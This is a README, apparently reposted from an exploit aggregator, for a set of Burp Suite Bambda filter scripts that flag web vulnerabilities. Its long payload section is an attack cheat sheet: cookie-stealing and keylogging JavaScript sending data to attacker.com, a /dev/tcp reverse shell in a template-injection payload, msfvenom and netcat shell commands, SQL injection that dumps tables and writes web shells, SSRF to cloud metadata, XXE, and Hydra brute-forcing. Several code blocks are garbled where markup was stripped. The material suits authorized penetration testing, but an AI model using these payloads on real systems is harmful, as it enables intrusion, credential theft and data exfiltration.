Share
## https://sploitus.com/exploit?id=BFE73192-7EAA-5126-B94A-8BB4AD2DF868
# Burp Suite Bambda Scripts - Vulnerability Testing Toolkit v2.0
This collection of **26 Bambda scripts** is designed to identify and test for a comprehensive range of web vulnerabilities including XSS, IDOR, Broken Authentication, Injection attacks, and modern API security issues.
> **v2.0 Update**: Added 9 new scripts, refined 7 existing scripts for reduced false positives
## Table of Contents
- [Installation](#installation)
- [XSS Scripts](#xss-scripts)
- [IDOR Scripts](#idor-scripts)
- [Broken Authentication Scripts](#broken-authentication-scripts)
- [Command Injection Scripts](#command-injection-scripts)
- [File Upload Scripts](#file-upload-scripts)
- [SQL Injection Scripts](#sql-injection-scripts)
- [NoSQL Injection Scripts](#nosql-injection-scripts) π
- [Server-Side Attack Scripts](#server-side-attack-scripts)
- [XXE Scripts](#xxe-scripts)
- [GraphQL Scripts](#graphql-scripts) π
- [JWT Security Scripts](#jwt-security-scripts) π
- [Path Traversal Scripts](#path-traversal-scripts) π
- [Open Redirect Scripts](#open-redirect-scripts) π
- [CRLF Injection Scripts](#crlf-injection-scripts) π
- [CORS Misconfiguration Scripts](#cors-misconfiguration-scripts) π
- [Error Disclosure Scripts](#error-disclosure-scripts) π
- [Race Condition Scripts](#race-condition-scripts) π
- [Brute-Force Scripts](#brute-force-scripts)
- [HTTP Verb Tampering Scripts](#http-verb-tampering-scripts)
- [Usage Workflow](#usage-workflow)
- [Testing Payloads](#testing-payloads)
## Installation
1. Open Burp Suite Professional
2. Navigate to any tool that supports Bambdas (Proxy, Repeater, Intruder, etc.)
3. Click on the filter/bambda icon
4. Select "Bambda" mode
5. Paste the script content from any `.bambda` file
6. The script will immediately start filtering requests/responses
## XSS Scripts
### 1. `xss_injection_points.bambda`
**Purpose**: Identifies requests with parameters that could be XSS injection points
**What it detects**:
- URL parameters
- POST form data
- JSON request bodies
- XSS-prone headers (Referer, User-Agent, X-Forwarded-For)
- File upload endpoints
**Use case**: Run this in Proxy > HTTP History to find all potential XSS testing targets
### 2. `xss_reflected_detector.bambda`
**Purpose**: Detects reflected XSS by finding user input echoed in responses
**What it detects**:
- Parameter values that appear in response body
- Potential reflected XSS vulnerabilities
**Use case**: Identify which parameters are being reflected back, then test with XSS payloads
### 3. `xss_dom_sinks.bambda`
**Purpose**: Finds dangerous DOM manipulation in JavaScript responses
**What it detects**:
- `document.write()`
- `innerHTML`, `outerHTML`
- `eval()`
- jQuery methods: `.add()`, `.after()`, `.append()`
- DOM sources: `location.href`, `window.name`, etc.
**Use case**: Identify JavaScript files with DOM XSS sinks for client-side testing
## IDOR Scripts
### 4. `idor_detector.bambda`
**Purpose**: Identifies requests vulnerable to Insecure Direct Object Reference
**What it detects**:
- Sequential numeric IDs in URLs (`/users/123`)
- IDOR-prone parameters (`user_id`, `doc_id`, `file_id`, etc.)
- Base64 encoded references
- API endpoints commonly vulnerable to IDOR
**Use case**: Find all endpoints with object references, then test by incrementing IDs
### 5. `idor_insecure_functions.bambda`
**Purpose**: Detects admin/privileged function calls that may allow privilege escalation
**What it detects**:
- Admin endpoints (`/admin`, `/delete`, `/update`)
- Dangerous HTTP methods (PUT, DELETE, PATCH) on user objects
- Role/permission parameters in requests
- JSON bodies with privilege fields
**Use case**: Test for horizontal/vertical privilege escalation via IDOR
## Broken Authentication Scripts
### 6. `auth_endpoint_detector.bambda`
**Purpose**: Identifies all authentication-related endpoints
**What it detects**:
- Login/signin endpoints
- Registration/signup pages
- Password reset functionality
- Protected admin/dashboard pages
- Session management endpoints
- Authentication parameters and cookies
**Use case**: Map all authentication surfaces for comprehensive testing
### 7. `auth_user_enumeration.bambda`
**Purpose**: Finds responses that leak username existence
**What it detects**:
- Error messages revealing if username exists ("unknown user", "incorrect password")
- Different status codes for valid/invalid users
- Response timing/content differences
**Use case**: Identify endpoints vulnerable to username enumeration for brute-forcing
### 8. `auth_password_reset.bambda`
**Purpose**: Detects password reset vulnerabilities
**What it detects**:
- Password reset endpoints
- Manipulable username/email parameters
- Reset tokens/codes (for predictability testing)
- Security questions (OSINT/guessing risk)
**Use case**: Test for account takeover via password reset manipulation
### 9. `auth_session_tokens.bambda`
**Purpose**: Identifies and flags session tokens for security analysis
**What it detects**:
- Session cookies (PHPSESSID, JSESSIONID, custom session IDs)
- Session tokens in URLs (session fixation risk)
- Set-Cookie headers (new session assignment)
- Authorization headers (Bearer tokens, JWT)
**Use case**: Analyze tokens for predictability, fixation, and improper timeout
## Command Injection Scripts
### 10. `cmdi_injection_detector.bambda`
**Purpose**: Identifies requests vulnerable to OS command injection
**What it detects**:
- Command injection parameter names (`cmd`, `exec`, `ping`, `run`, etc.)
- OS command operators (`;`, `&&`, `||`, `|`, `` ` ``, `$()`, `${}`)
- Common command injection endpoints
- Command operators in parameter values
**Use case**: Find injection points for testing with `whoami`, `ping`, `sleep` payloads
## File Upload Scripts
### 11. `file_upload_detector.bambda`
**Purpose**: Identifies file upload functionality and multipart requests
**What it detects**:
- File upload endpoints (`/upload`, `/file`, `/attachment`)
- `multipart/form-data` Content-Type
- File-related parameters
- Filename patterns and extensions in request body
**Use case**: Test for arbitrary file upload vulnerabilities with web shells
## SQL Injection Scripts
### 12. `sqli_detector.bambda`
**Purpose**: Detects potential SQL injection vulnerabilities
**What it detects**:
- SQL operators and special characters (`'`, `"`, `;`, `--`, `/*`, `*/`)
- SQL keywords (`UNION`, `SELECT`, `FROM`, `WHERE`, etc.)
- Common SQLi payloads (`' or 1=1--`, `admin'--`)
- Database-related endpoints
**Use case**: Identify injection points for SQLMap or manual SQL injection testing
## Server-Side Attack Scripts
### 13. `ssrf_detector.bambda`
**Purpose**: Identifies Server-Side Request Forgery opportunities
**What it detects**:
- URL parameters (`url`, `uri`, `callback`, `webhook`, `redirect`)
- URL schemes in parameters (`http://`, `file://`, `gopher://`)
- IP addresses in parameter values
- SSRF-prone endpoints (`/fetch`, `/proxy`, `/import`)
**Use case**: Test for internal network access and localhost bypass
### 14. `ssti_detector.bambda`
**Purpose**: Detects Server-Side Template Injection indicators
**What it detects**:
- Template engine error messages (Jinja2, Twig, Smarty, etc.)
- Template syntax in responses (`{{`, `}}`, `{%`, `%}`, `${`)
- Server-Side Includes (SSI) syntax (`alert(window.origin)
print()
```
#### Cookie Stealer
```javascript
fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie));
```
#### Keylogger
```javascript
document.onkeypress = function(e) { fetch('https://attacker.com/log?key=' + btoa(e.key) );}
```
#### Polyglot (from your notes)
```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//\x3csVg/\x3e
```
### IDOR Testing
#### Numeric ID Enumeration (Intruder)
```
Original: /api/users/123
Test: /api/users/Β§1Β§
Payload type: Numbers (1-1000)
```
#### Base64 Encoded References
```bash
# Generate payloads for Intruder
for i in {1..100}; do echo -n $i | base64 -w 0; echo; done > base64_ids.txt
```
#### MD5 + Base64 (from your notes example)
```bash
# For MD5 hash of base64 encoded IDs
for i in {1..100}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done > md5_base64_ids.txt
```
#### HTTP Method Tampering
```
Original GET: /api/profile/123
Test: Change to PUT, DELETE, PATCH
Add: {"role": "admin"}
```
### Authentication Bypass
#### User Enumeration (with ffuf)
```bash
ffuf -w usernames.txt -u https://example.com/login \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=FUZZ&password=invalid" \
-fr "Unknown user"
```
#### Parameter Manipulation (Burp Repeater)
```
Original POST to /reset_password.php:
password=NewPass123
Modified POST (intercept and add):
password=NewPass123&username=admin
```
### Command Injection Payloads
#### Basic Detection (Linux)
```bash
; whoami
&& whoami
| whoami
` whoami `
$(whoami)
; ls -la
&& cat /etc/passwd
```
#### Basic Detection (Windows)
```cmd
& whoami
&& whoami
| whoami
; dir
& type C:\Windows\System32\drivers\etc\hosts
```
#### Blind Command Injection
```bash
# Time-based (Linux)
; sleep 10
&& ping -c 10 127.0.0.1
| sleep 5
# Time-based (Windows)
& timeout 10
&& ping -n 10 127.0.0.1
# Output redirection
; whoami > /var/www/html/output.txt
&& ls > output.txt
```
#### Filter Bypass Techniques
```bash
# Blacklisted spaces bypass
; cat${IFS}/etc/passwd
&& cat%09/etc/passwd
| cat
```
Access: `http://target.com/uploads/shell.php?cmd=whoami`
#### Basic ASP Web Shell
```asp
```
Access: `http://target.com/uploads/shell.asp?cmd=whoami`
#### Extension Fuzzing List
```
# Double extensions
shell.jpg.php
shell.php.jpg
# Alternative PHP extensions
.php3, .php4, .php5, .php7, .pht, .phtml, .phps
# Alternative ASP extensions
.asp, .aspx, .cer, .asa
# Case variations
.PhP, .pHp, .PHP
# Null byte injection
shell.php%00.jpg
shell.php\x00.jpg
# Character injection
shell.php%0a.jpg
shell.php%0d.jpg
shell.php;.jpg
shell.php .jpg
```
#### Content-Type Fuzzing
```
# Test different MIME types
image/jpeg
image/png
image/gif
application/octet-stream
text/plain
application/x-php
```
#### SVG XSS Payload
```xml
alert(document.domain);
```
#### Reverse Shell Generation
```bash
# msfvenom PHP reverse shell
msfvenom -p php/reverse_php LHOST=YOUR_IP LPORT=4444 -f raw > shell.php
# Start listener
nc -lvnp 4444
```
### SQL Injection Payloads
#### Authentication Bypass
```sql
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' or 1=1--
" OR 1=1--
') or ('1'='1--
admin')--
```
#### Union-Based SQLi
```sql
# Determine number of columns
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# Union injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# Extract data
' UNION SELECT 1,@@version,3,4--
' UNION SELECT 1,database(),3,4--
' UNION SELECT 1,user(),3,4--
```
#### Database Enumeration (MySQL)
```sql
# List databases
' UNION SELECT 1,SCHEMA_NAME,3,4 FROM INFORMATION_SCHEMA.SCHEMATA--
# List tables
' UNION SELECT 1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='database_name'--
# List columns
' UNION SELECT 1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'--
# Extract data
' UNION SELECT 1,username,password,4 FROM users--
```
#### File Operations (MySQL)
```sql
# Read files
' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4--
# Check permissions
' UNION SELECT 1,super_priv,3,4 FROM mysql.user--
# Write web shell
' UNION SELECT 1,'',3,4 INTO OUTFILE '/var/www/html/shell.php'--
```
#### Blind SQLi (Boolean-Based)
```sql
' AND 1=1-- # True
' AND 1=2-- # False
' AND (SELECT LENGTH(database()))>5--
' AND SUBSTRING(database(),1,1)='a'--
```
#### Blind SQLi (Time-Based)
```sql
' AND SLEEP(5)--
' OR IF(1=1,SLEEP(5),0)--
' UNION SELECT IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
```
#### Filter Bypass
```sql
# No quotes
CONCAT(0x61,0x64,0x6d,0x69,0x6e) # Constructs 'admin'
# No spaces
SELECT/**/username/**/FROM/**/users
SELECT%09username%09FROM%09users
SELECT%0Ausername%0AFROM%0Ausers
# Obfuscated keywords
SeLeCt * FrOm users
SE/**/LECT * FR/**/OM users
```
#### SQLMap Automation
```bash
# Basic scan
sqlmap -u "http://target.com/page.php?id=1" --batch --dbs
# With authentication
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" --dbs
# POST request
sqlmap -u "http://target.com/login.php" --data="username=admin&password=pass" --dbs
# Dump database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump
```
### SSRF Payloads
#### Basic SSRF Detection
```
http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]
http://169.254.169.254 # AWS metadata
```
#### Internal Network Scanning
```
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
```
#### File Disclosure via SSRF
```
file:///etc/passwd
file:///c:/windows/system32/drivers/etc/hosts
file:///var/www/html/config.php
```
#### Gopher Protocol (Advanced)
```bash
# Generate gopher payload with Gopherus
python gopherus.py --exploit mysql
# Example gopher URL
gopher://127.0.0.1:3306/_payload_here
```
#### Cloud Metadata Exploitation
```
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
```
### SSTI Payloads
#### Detection Payloads
```
${{
${{7*7}}
#{7*7}
```
#### Jinja2/Flask (Python)
```python
# Information disclosure
{{ config.items() }}
{{ self.__dict__ }}
# File read
{{ self.__init__.__globals__.__builtins__.open('/etc/passwd').read() }}
# RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('whoami').read() }}
# Reverse shell
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"').read() }}
```
#### Twig (PHP)
```php
# RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
```
#### Smarty (PHP)
```php
# RCE
{system('whoami')}
{php}echo `whoami`;{/php}
```
#### Freemarker (Java)
```java
# RCE
${ ex("whoami") }
```
### XXE Payloads
#### Basic XXE (File Disclosure)
```xml
]>
&xxe;
```
#### XXE with PHP Filter (Source Code)
```xml
]>
&xxe;
```
#### XXE via SVG Upload
```xml
]>
&xxe;
```
#### OOB XXE (Blind Exfiltration)
**Host on your server (xxe.dtd):**
```xml
">
```
**Inject in request:**
```xml
%remote;
%oob;
]>
&content;
```
#### XXE RCE (with expect module)
```xml
]>
&xxe;
```
### Brute-Force Payloads
#### Hydra Examples
```bash
# HTTP Basic Auth
hydra -L users.txt -P passwords.txt example.com http-get /admin
# HTTP POST form
hydra -L users.txt -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# SSH
hydra -L users.txt -P passwords.txt ssh://example.com
# FTP
hydra -L users.txt -P passwords.txt ftp://example.com
```
#### ffuf Brute-Force Examples
```bash
# Password reset token
ffuf -w tokens.txt -u http://example.com/reset?token=FUZZ -fr "invalid token"
# 2FA bypass
ffuf -w codes.txt -u http://example.com/2fa -X POST -d "code=FUZZ" -b "session=abc123" -fr "Invalid code"
# User enumeration
ffuf -w users.txt -u http://example.com/login -X POST -d "username=FUZZ&password=test" -mr "Unknown user"
```
### HTTP Verb Tampering Payloads
#### Method Override Testing (Burp Repeater)
```
# Original GET request to protected endpoint
GET /admin HTTP/1.1
Host: example.com
β 401 Unauthorized
# Change to POST
POST /admin HTTP/1.1
Host: example.com
β Test if access granted
# Try other methods
PUT /admin HTTP/1.1
DELETE /admin HTTP/1.1
OPTIONS /admin HTTP/1.1
HEAD /admin HTTP/1.1
PATCH /admin HTTP/1.1
```
#### Method Override Headers
```
# Add X-HTTP-Method-Override header
GET /admin HTTP/1.1
Host: example.com
X-HTTP-Method-Override: POST
# Alternative override headers
X-HTTP-Method: PUT
X-Method-Override: DELETE
```
#### _method Parameter Injection
```
# In POST body
POST /admin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
_method=PUT
# In query string
GET /admin?_method=DELETE HTTP/1.1
Host: example.com
```
#### Bypass Security Filters with Method Change
```
# Original filtered GET request
GET /search?code=' OR 1=1-- HTTP/1.1
β Blocked by filter
# Change to POST (if filter only checks GET)
POST /search HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
code=' OR 1=1--
β May bypass filter if developer only sanitized GET
```
#### OPTIONS Method Enumeration
```bash
# Check allowed methods with curl
curl -i -X OPTIONS http://example.com/admin
# Response will show:
Allow: GET, POST, PUT, DELETE, OPTIONS
```
#### Automated Testing with Burp Intruder
```
1. Send request to Intruder
2. Clear all positions
3. Add position to method: Β§GETΒ§ /admin
4. Payload list: GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS
5. Start attack
6. Look for different status codes (200 instead of 401/403)
```
#### Common Vulnerable Patterns
```
# Authentication bypass
GET /login HTTP/1.1 β 200 OK (login form)
POST /login HTTP/1.1 β 401 (failed auth)
HEAD /login HTTP/1.1 β 200 OK (bypass?)
# Admin access
GET /admin HTTP/1.1 β 403 Forbidden
POST /admin HTTP/1.1 β 200 OK (access granted!)
# File operations
GET /delete?file=test.txt β 403 Forbidden
DELETE /delete?file=test.txt β 200 OK (deleted)
```
#### Advanced: REST API Method Tampering
```
# Original API design
GET /api/users/123 β Read user
PUT /api/users/123 β Update user (requires auth)
DELETE /api/users/123 β Delete user (requires admin)
# Test with method tampering
GET /api/users/123
X-HTTP-Method-Override: DELETE
β May delete without proper authorization
```
#### Wordlist Generation
```bash
# Sequential numbers for tokens
seq -w 0 9999 > tokens.txt
# CUPP for personalized passwords
python3 cupp.py -i
# Username Anarchy for username variations
./username-anarchy john doe > usernames.txt
```
#### Session Fixation Test
```
1. Get valid session: GET /login β Set-Cookie: PHPSESSID=abc123
2. Logout: GET /logout
3. Send victim link: https://example.com/?PHPSESSID=abc123
4. After victim logs in, use session: Cookie: PHPSESSID=abc123
```
#### Direct Access Bypass (Burp Repeater)
```
1. Intercept GET /admin.php β 302 redirect
2. Right-click β "Do intercept > Response to this request"
3. Change response: 302 Found β 200 OK
4. Forward to see protected content
```
## Testing Methodologies
### XSS Testing Flow
1. Use `xss_injection_points.bambda` to find input fields
2. Test with basic payload: `alert(1)`
3. If blocked, try:
- Different contexts: `" onload="alert(1)`
- Encoding: `<script>alert(1)</script>`
- Polyglot payload
4. Use `xss_reflected_detector.bambda` to confirm reflection
5. Check `xss_dom_sinks.bambda` for client-side vulnerabilities
### IDOR Testing Flow
1. Use `idor_detector.bambda` to find object references
2. Create two accounts (if possible)
3. Note User A's IDs/references
4. Try accessing User A's resources as User B
5. Test both horizontal (same role) and vertical (different roles)
6. Use `idor_insecure_functions.bambda` to test privilege escalation
### Authentication Testing Flow
1. Use `auth_endpoint_detector.bambda` to map all auth endpoints
2. Test user enumeration with `auth_user_enumeration.bambda`
3. Analyze session tokens with `auth_session_tokens.bambda`:
- Check for predictability (sequential numbers, timestamps)
- Test for session fixation
- Verify proper timeout
4. Test password reset with `auth_password_reset.bambda`
5. Try parameter manipulation and direct access bypass
## Burp Intruder Configuration
### For IDOR Enumeration
```
Target: /api/users/Β§123Β§/profile
Attack type: Sniper
Payload type: Numbers
From: 1
To: 1000
Step: 1
Grep - Match: Add success indicators (200, profile data, etc.)
```
### For Session Token Analysis
```
Target: Cookie: session=Β§abc123Β§
Attack type: Sniper
Payload type: Custom iterator
Use collected session tokens
Analyze results for patterns (sequential, predictable)
```
### For User Enumeration
```
Target: username=Β§adminΒ§&password=test
Attack type: Sniper
Payload type: Runtime file
File: /path/to/usernames.txt
Grep - Extract: Extract error messages
Look for different responses (Unknown user vs Invalid password)
```
## Additional Resources
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [SecLists Wordlists](https://github.com/danielmiessler/SecLists)
## Responsible Disclosure
These scripts are for authorized security testing only. Always:
- Get written permission before testing
- Follow responsible disclosure guidelines
- Respect scope boundaries
- Document findings professionally
## Script Summary
**Total Scripts: 26** (v2.0 - Updated 2026-01-28)
| Category | Scripts | Count | Status |
|----------|---------|-------|--------|
| XSS | injection_points, reflected_detector, dom_sinks | 3 | β
Refined |
| IDOR | detector, insecure_functions | 2 | β
Refined |
| Broken Auth | endpoint_detector, user_enumeration, password_reset, session_tokens | 4 | β
Maintained |
| Command Injection | injection_detector | 1 | β
Refined |
| File Upload | detector | 1 | β
Maintained |
| SQL Injection | detector | 1 | β
Refined |
| NoSQL Injection | nosql_injection_detector | 1 | π New |
| Server-Side | ssrf_detector, ssti_detector | 2 | β
Refined |
| XXE | detector | 1 | β
Maintained |
| GraphQL | graphql_injection_detector | 1 | π New |
| JWT Security | jwt_vulnerability_detector | 1 | π New |
| Path Traversal | path_traversal_detector | 1 | π New |
| Open Redirect | open_redirect_detector | 1 | π New |
| CRLF Injection | crlf_injection_detector | 1 | π New |
| CORS | cors_misconfiguration_detector | 1 | π New |
| Error Disclosure | error_disclosure_detector | 1 | π New |
| Race Conditions | race_condition_detector | 1 | π New |
| Brute-Force | target_detector | 1 | β
Maintained |
| HTTP Verb Tampering | detector | 1 | β
Maintained |
### v2.0 Refinements
- **xss_injection_points.bambda**: Added HTML response filtering (~60% fewer false positives)
- **xss_reflected_detector.bambda**: Added URL/HTML encoding detection, minimum value length check
- **xss_dom_sinks.bambda**: Added modern DOM sinks (insertAdjacentHTML, setAttribute, etc.)
- **idor_detector.bambda**: Tightened base64 detection (16-44 chars), added UUID/GUID patterns
- **cmdi_injection_detector.bambda**: Fixed parentheses false positives
- **sqli_detector.bambda**: Multi-indicator requirement (~70% fewer false positives)
- **ssrf_detector.bambda**: Added cloud metadata IP detection (AWS, GCP, Azure)
- **ssti_detector.bambda**: Improved test result matching with syntax context
## Future Enhancements
Potential additions for v3.0:
- **WebSocket Injection Detector**: Find WebSocket message manipulation points
- **Insecure Deserialization Detector**: Identify serialized object handling
- **Mass Assignment Detector**: Find unprotected model binding
- **Business Logic Flaw Detector**: Identify race condition-prone workflows
- **OAuth/SAML Misconfiguration Detector**: Find SSO implementation issues
- **Security Header Analyzer**: Detect missing security headers
- **Clickjacking Detector**: Find missing X-Frame-Options headers